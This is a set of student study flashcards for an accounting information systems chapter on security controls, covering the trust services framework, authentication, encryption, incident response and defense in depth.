AIS Chapter 11
Corrective Controls: Computer Incident response team: The CIRT should lead the organization's incident response process through four steps, what are they?
1. Recognition that a problem exists 2. Containment of the problem 3. Recovery 4. Follow-up
Management has to make sure the organization is in compliance with both regulatory (legal) and industry standards of what 5 organizations?
1. Sarbanes-Oxley (SOX) 2. Health Insurance Portability and Accountability Act (HIPAA) 3. Health Information Technology for Economic and Clinical Health Act (HITECH) 4. EU's General Data Privacy Regulation (GDPR) 5. Payment Card Industry Data Security Standards (PCI-DSS)
Trust services framework: What are the five basic principles that contribute to systems reliability? Describe each.
1. Security (foundation) - the access to the system and its data is controlled 2. Confidentiality (Pillar) - Sensitive information is protected from unauthorized disclosure. 3. Privacy (Pillar) - ·Personal information about customers collected through e-commerce is collected, used, disclosed, and maintained in an appropriate manner. 4. Processing integrity (Pillar) - provides assurance that everything in the audited system is complete, valid, accurate, timely and authorized to fully satisfy the entity's objectives 5. Availability (Pillar) - ·The system is available to meet operational and contractual obligations. *The foundation, along with the 4 pillars hold up the Systems Reliability (The Roof) of the Trust services framework
What are the three fundamental information security concepts?
1. Security as a management issue, not a technology issue. 2. People are the critical factor 3. Defense in depth & time-based model of security.
Senior management's involvement in the security environment can help overcome problems with what 2 things?
1. Separate silos in the organization who do not communicate well with each other 2. Turf battles between different functions and departments
Corrective Controls: Designation of a specific individual with organization-wide responsibility for security: State 3 characteristics about a chief information security officer (CISO).
1. Should be independent of other IS functions and report to either the COO or CEO. 2. Must understand the company's technology environment and work with the CIO to design, implement, and promote sound security policies and procedures. 3. Should impartially assess and evaluate the IT environment, conduct vulnerability and risk assessments, and audit the CIO's security measures.
Preventative controls: User Access Controls:Users can be authenticated by verifying... (3 things)
1. Something they know, such as passwords or PINs. 2. Something they have, such as smart cards or ID badges. 3. Some physical characteristic (biometric identifier), such as fingerprints, voice, typing pattern.
Ch 11 focuses on - Ch 12 focuses on - Ch 13 focuses on -
11 - Security (foundation) 12 - Confidentiality & Privacy (Pillars) 13 - Processing integrity & Availabilty (Pillars)
Preventative controls: IT Solutions: Device and software hardening: What is a patch
A code released by software developers to fix vulnerabilities that have been discovered.
Detective Controls: HoneyPots: Describe HoneyPots
A decoy system used to provide early warning that an insider or outsider is attempting to search for confidential information. Looks like legitimate part of computer system
Preventative controls: IT Solutions: Encryption: What 2 things are needed to encrypt and decrypt
A key and an algorithm
Corrective Controls: Computer Incident response team: What are computer incident response teams and who should be included in them?
A key component to being able to respond to security incidents promptly and effectively Responsible for dealing with major incidents. Should include technical specialists and senior operations management.
Preventative controls: IT Solutions: Device and software hardening: Why is software design important in this respect?
Organizations need to be aware of issues of client facing software. The software may be the most vulnerable part of the computer system.
Preventative controls: User Access Controls: ________________ are probably the most commonly used authentication method and also the most controversial.
Passwords
Preventative controls: IT Solutions: Device and software hardening: Why is patch management challenging?
Patches can have unanticipated side effects that cause problems, which means they should be tested before being deployed.
People are the critical factor: _____________ are often the weakest link in the information security of a company.
People
What 3 major types of preventative controls are used for defense in depth? (Describe each)
Physical Security ¤Access controls Process: User Access Controls: ¤Authentication controls ¤Authorization controls IT Solutions: ¤Antimalware Controls ¤Network access controls ¤Device and Software Hardening Controls ¤Encryption
Time-based model of security: What 3 controls does time- based model of security focus on implenting and why do they do this?
Preventive, detective, and corrective controls ¤enable an organization to recognize that an attack is occurring and take steps to thwart it before any assets have been compromised.
Preventative controls: User Access Controls: What are authorization controls?
Process of restricting access of authorized users to specific portions of the system
Monitoring: Penetration testing: What is penetration testing?
Provides a rigorous way to test the effectiveness of an organization's information security. This testing involves an authorized attempt by either an internal audit team or external security consulting firm to break into the organization's IS.
What is cloud computing? And what are the 3 versions?
Remotely Access Computer resources: ¤Software Applications ¤Data Storage ¤Hardware
Preventative controls: IT Solutions: Encryption: What is decryption?
Reverses encryption.
Preventative controls: IT Solutions: Network access controls: What is a demilitarized Zone (DMZ)?
Separate network that permits controlled access from the Internet to selected resources
Preventative controls: IT Solutions: Network access controls: What is a firewall?
Software or hardware used to filter information based on packet data.
Preventative controls: User Access Controls: Limitations of biometric techniques.
Some techniques like fingerprints may carry negative connotations that hinder acceptance. Easily hackable Sometimes won't work. (phone face scan) Company can replicate or if data is comprimised then hacker has your ie fingerprint
Preventative controls: User Access Controls: What is an access control matrix?
Specifies what part of the information system a user can access and what actions they are permitted to perform. When an employee tries to access a particular resource, the system performs a compatibility test that matches the user's authentication credentials against the matrix to determine if the action should be allowed.
What are the 4 steps of the Security life cycle?
Step 1: Access the information security risks Step 2: Develop information security policies and communicating them to employees Step 3: Acquire or build specific technological tools Step 4: Monitor the performance of the organization's information security program.
Preventative controls: IT Solutions: Encryption: Hashing: What is a merkle tree?
Takes 2 texts that will be hashed, then the two now hashed codes will also get hashed. This continues until at the top hash, which is called a root hash If any changes are made to earlier transactions, the root hash will be different
Preventative controls: IT Solutions: Encryption: Hashing: What is hashing?
Takes plaintext of any length and transforms it into a short code called a hash.
Preventative controls: User Access Controls:What are 2 related functions in Process: User Access Controls? Describe each.
1. Authentication Focuses on verifying the identity of the person or device attempting to gain access. 2. Authorization Restricts access of authenticated users to specific portions of the system and specifies what actions they are permitted to perform.
People are the critical factor: What 3 things should management do to create a security aware culture:
1. Communicate security Policies 2. Lead by example 3. Continuous security awareness training
Monitoring: Change Controls and Change Management: What are 5 requirements of good change management and control?
1. Documentation 2. Approval 3. Testing 4. Develop "backout" plan (revert to previous version) 5. Monitoring
Corrective Controls: Two key components that satisfy the basic principals of response (corrective controls) are:
1. Establishment of a computer Incident response team (CIRT) 2. Designation of a specific individual with organization-wide responsibility for security.
People are the critical factor: While training employees about security measures, explain critically what 2 things?
1. How to follow company security policies ¤Especially for new employees 2. Why security measures are important
Preventative controls: Physical Security: What are 7 types of physical security access controls
1. Limit entry to building ¤Fire doors should be one way and alarmed 2. Restrict access to network and data 3. Limit access to servers 4. Secure laptops and hard drives 5. Restrict access to network wiring 6. Restrict access to network printers 7. INTEGRATE PHYSICAL CONTROLS WITH LOGICAL CONTROLS- Can only log in physically if you are "swiped in" through security
What are 4 major types of detective controls used for defense in depth?
1. Log analysis 2. Intrusion detection systems 3. Honeypots 4. Continuous Monitoring
Preventative controls: IT Solutions: Antimalware Controls: Name six antimalware controls.
1. Malicious software awareness education 2. Installation of antimalware protection tools on all devices 3. Centralized management of patches and updates to antimalware software 4. Regular review of new malware threats 5. Filtering of incoming traffic to block potential sources of malware 6. Training employees not to install shared or unapproved software
Monitoring: What are the 2 ways that monitoring remedies any deficiencies?
1. Penetration Testing 2. Change Control and Change Management
People are the critical factor: What are 6 common issues when training employees?
1. Phishing scams (Spear Phishing) 2. Unsafe email attachments 3. Locking Computers 4. Understanding Social Engineering Attacks -Never divulge passwords, workstation details, network configurations, etc. 5. Don't allow Piggybacking through doors 6. Training technical support staff on new issues
What 3 controls does this chapter boil down to and what do these controls do?
1. Preventative controls - PROTECTION 2. Dectective Controls - DETECTION 3. Corrective Controls - RESPONSE
Preventative controls: IT Solutions: Device and software hardening: Software design: What is Cross site scripting? Give an example.
A vulnerability between a website and a browser. I.e.: You click a link to a suspicious website, they send code. You are logged into your bank, they are now also logged into your bank!
Preventative controls: IT Solutions: Encryption: Hashing: What is a digital certificate?
An electronic document, created and digitally signed by a trusted third party Provide an automated method for obtaining an organization's or individual's public key
Preventative controls: IT Solutions: Device and software hardening: Software design: What is SQL injection?
Attackers ask the database questions and through a process of elimination they can steal data
Preventative controls: IT Solutions: Device and software hardening: Software design: What are buffer overflows?
Attackers send too much data and either get the software to break or they send extra commands with legitimate data.
Preventative controls: IT Solutions: Device and software hardening: What are script kiddies?
Attackers who execute these programmed exploits
Why is security the foundation of systems reliability? What two things does it protect?
Because it.. Restricts system access to only authorized users and protects: 1.The confidentiality of sensitive organizational data. 2. The privacy of personal identifying information collected from customers
How do security procedures provide for processing integrity?
By preventing.. 1. Submission of unauthorized or fictitious transactions. 2. Unauthorized changes to stored data or programs.
Security as a management issue, not a technology issue: SOX Sec. 302 States:
CEO and the CFO responsible to certify that the financial statements fairly present the results of the company's activities.
Corrective Controls: __________ specifies the need to identify and handle security incidents.
COBIT
Preventative controls: User Access Controls: Limitations of passwords.
Can be guessed, lost, written down, or given away.
Preventative controls: IT Solutions: Device and software hardening: What are vulnerability scanners?
Can be used to find weaknesses
Preventative controls: IT Solutions: Device and software hardening: What are endpoints?
Collective term for the workstations, servers, printers, and other devices that comprise an organization's network.
Preventative controls: IT Solutions: Network access controls: What is a border router?
Connects an organization's information system to the Internet helps route packets of data using source and destination address information in packets.
Preventative controls: User Access Controls: Limitations of Physical Identitfication Techniques.
Include cards, badges, and USB devices, cell phones. These can be lost, stolen, or duplicated.
Detective Controls: Intrusion detection systems: Describe an intrusion detection system (IDS).
Detects unusual behaivor Creates a log of network traffic that was permitted to pass the firewall. Represent an attempt to automate part of the monitoring. (Faster than log analysis) Notifies users they need to act if something is out of the normal range.
What is the internet of things?
Devices that connect to the internet or network ¤Sensors ¤Cameras ¤Phones ¤Coffee Makers ¤Litter Box
Preventative controls: IT Solutions: Encryption: Asymmetric encryption and hashing are used to create ____________.
Digital signitures
Preventative controls: IT Solutions: Encryption: What specific transactions do encryption play an essential role in verifying the validity of?
E-business transactions
Preventative controls: User Access Controls: Describe media access control
Each network device has a unique identifier, referred to as its MAC address. It is possible to restrict network access to only those devices which have a recognized MAC address or to use MAC addresses for authorization.
Preventative controls: IT Solutions: Encryption: Hashing: Give 2 ways that encryting and hashing are different.
Encryption always produces ciphertext similar in length to the plaintext, but hashing produces a hash of a fixed short length. Encryption is reversible, but hashing is not; you cannot transform a hash back into its original plaintext.
Detective Controls: Why are detective contols in place?
Enhance security Preventive controls are never 100% effective in blocking all attacks. Need to detect incidents in which preventive controls have been circumvented.
Monitoring: Change Controls and Change Management: What is change controls and change management?
Formal process used to ensure that modifications to hardware, software, or processes do not reduce systems reliability
Preventative controls: IT Solutions: Device and software hardening: What are exploits?
Hackers usually publish instructions for hacking on the Internet.
Preventative controls: User Access Controls: What is dynamic authorization?
Identifier changes either as a result of an event such as connecting to a network or over time. Employee is only authorized to perform a specific task for a transaction when they are talking with a particular customer.
Preventative controls: User Access Controls: What is static authorization
Identifier does not change over time.
Time-based model of security: Describe Detective controls
Identify when preventive controls have been breached.
Preventative controls: IT Solutions: Encryption: Hashing: What is a digital signiture?
Information encrypted with the creator's private key. That information can only be decrypted using the corresponding public key.
COBIT addresses...
Information technology internal controls
Detective Controls: Log analysis: What is a mjor weakness of log analysis?
It is labor intensive and prone to human error
Time-based model of security: Describe preventative controls
Limit actions to those in accord with the organization's security policy and disallows all others.
Detective Controls: Log analysis: Why is it important to audit the audit trail of a log?
Logs form an audit trail of system access. Need to see if: Was it deleted? Was it modified?
What is meant by, "Security as a management issue, not a technology issue?"
Management is responsible for the internal controls around a company
Detective Controls: Monitoring: Describe monitoring.
Management should monitor both employee compliance with the organization's information security policies and overall performance of business processes.
Preventative controls: IT Solutions: Device and software hardening: What is hardening?
Many hardware and software applications ship with default passwords and settings. -The changing of these settings upon installation so hackers cannot easily use the default user accounts and passwords to gain entry to the system.
What is the fourth stage in the security life cycle?
Monitoring
Preventative controls: IT Solutions: Network access controls: Describe Intrusion Prevention System (IPS).
Monitors patterns in the traffic flow, rather than only inspecting individual packets, to identify and automatically block attacks
Detective Controls: Log analysis: Describe log analysis.
Most systems come with extensive capabilities for logging who accesses the system and what specific actions each user performed. Log analysis is the process of examining logs to monitor security.
Preventative controls: User Access Controls: Which is stronger, multi-factor or multi-modal?
Multi-factor
What is Virtualiztion? And who are super users?
Multiple "virtual computer" systems are run on one large powerful computer Super Users (Administrators) can access all of the virtual systems
Preventative controls: User Access Controls: What is Multi-Modal Authentication? Provide 2 examples.
Using multiple credentials of the same type. ¤Face and Voice etc. ¤Username and Password
Cloud computing often uses __________________.
Virtualization
Preventative controls: IT Solutions: Device and software hardening: What is patch management and the what are the 4 things that need to have the latest updates installed in them?
The process for regularly applying patches and updates to all of an organization's software. ¤Anti-virus software ¤Firewalls ¤Operating systems ¤Application programs
Preventative controls: IT Solutions: Encryption: What is encryption?
The process of transforming normal text, called plaintext, into unreadable gibberish, called ciphertext.
Preventative controls: User Access Controls: What are Multi-factor authentication? Provide 2 examples.
The use of two or three of different types of credentials ¤Palm print and a PIN number ¤Swipe card and Pin number
Security procedures protect against...
a variety of attacks, including viruses and worms, thereby ensuring the system is available when needed.
Preventative controls: User Access Controls: Every workstation, printer, or other computing device needs a _______ _________ _______ to connect to the organization's network.
network interface card (NIC)
The _____________ of an organization's financial statements depends upon the ________________ of its information systems.
accuracy, reliability
What is the Trust Services Framework?
developed by the AICPA and CICA (Canadian) relates to systems reliability (security, confidentiality, privacy, process integrity, availability). a set of principles for assessing the risk and opportunities associated with the information security of an organization
Preventative controls: IT Solutions: Network access controls: What are 2 things that both border routers and firewalls use? Describe each.
¤ Packet Filtering- which packets get in ¤Access Control Lists -what to do with arriving packets
Preventative controls: IT Solutions: What are the four components of IT Solutions?
¤Antimalware Controls ¤Network access controls ¤Device and Software Hardening Controls ¤Encryption
What are 2 major types of Corrective controls used for defense in depth?
¤Computer incident response teams (CIRT) ¤Chief Information Security Officer (CISO)
What are 5 things that all virtual machines share?
¤Hard drive ¤Motherboard ¤Disk Drives ¤Printers ¤Network
Time-based model of security: How are the variables evaluated?
¤If P > (D + R), then security procedures are effective. ¤Otherwise, security is ineffective.
Detective Controls: What are 4 components of detective controls?
¤Log analysis ¤Intrusion detection systems ¤Honeypots ¤Monitoring
Time-based model of security: The time-based model evaluates the effectiveness of an organization's security by measuring and comparing the relationship among what three variables? (Describe each)
¤P = Time it takes an attacker to break through the organization's preventive controls. ¤D = Time it takes to detect that an attack is in progress. ¤R = Time to respond to the attack.
Corrective Controls: Two of the Trust Services framework criteria for effective security are the existence of procedures to:
¤React to system security breaches and other incidents. ¤Take corrective action on a timely basis.
Time-based model of security: Describe Corrective (response) controls
¤Repair damage from problems that have occurred. ¤Improve preventive and detective controls to reduce likelihood of similar incidents.
What is the idea of defense in depth? What are 4 characteristics of it?
¤The idea of defense-in-depth is to employ multiple layers of controls to avoid having a single point of failure. 1. No control is 100% effective 2. Overlapping, complimentary, and Redundant controls help. 3. If one layer fails, another may function as planned. 4. The formula is not an exact science.